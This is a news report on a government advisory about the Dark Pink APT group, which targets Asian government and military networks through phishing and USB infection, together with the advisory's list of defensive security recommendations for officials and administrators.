According to a Cabinet Division advisory, Dark Pink, a new Advanced Persistent Threat (APT) group operational since mid-2021 is targeting Asian governments and military setups. The APT group uses sophisticated tactics, techniques, and procedures that warrant the employment of proactive cyber security monitoring in government and military setups.
According to the advisory, a recent analysis of attacks on the Malaysian Armed Forces (MAF) reveals the use of phishing emails and sophisticated attacks on email networks by Dark Pink. The group is also active in Pakistan to attack government institutions and military setups.
Dark Pink uses techniques such as USB infection and DLL exploitation to exploit systems. The primary means of compromise (unauthorized intrusion and access) is phishing emails.
The Cabinet Division has asked government officials to not open unknown and suspicious emails, links, and attachments. Use an email service provider anti-virus scanner before downloading any attachments and timely update all applications and operating systems (mobile and PC).
It has recommended using well-reputed and updated anti-virus/anti-malware. A Regular review of applications permissions, system running processes, and storage utilization. The use of separate and complex passwords for each system, mobile, social media accounts, financial and mailing accounts, etc.
The advisory has asked government officials to never use personal accounts on official systems and use multi-factor authentication (MFA)/ two-factor authentications where possible. It has also asked to not share personal details and credentials with unauthorized/suspicious users, websites, and applications. it has asked to always type URLs in the browser rather than clicking on links. Moreover, the advisory has asked to always open websites with HTTPS and avoid visiting HTTP websites.
The Cabinet Division has asked the administrators in government offices and divisions to restrict incoming traffic and user permissions to the maximum extent by implementing system hardening at OS, BIOS, and application levels. It has also asked to block unauthorized USB and storage media via hardening and to format the USB every time before using it to ensure no malware is propagated from one system to another and monitor networks including file hashes, file locations, logins, and unsuccessful login attempts.
The advisory has asked the administrators to use reputed anti-virus, firewalls, IPS/lDS, and SIEM solutions and use separate servers/routing for offline LAN and online networks. It has also asked to allow internet access to specific users on a need basis and restrict data usage/ applications rights.
It has recommended verifying software and documents before downloading via digital code-signing technique. The advisory has asked to implement MFA in mailing systems administrator controls and other critical systems. It has proposed to maintain a backup of critical data periodically in addition to regularly changing passwords at the administrator level and patching and updating all OS, applications, and other technical equipment.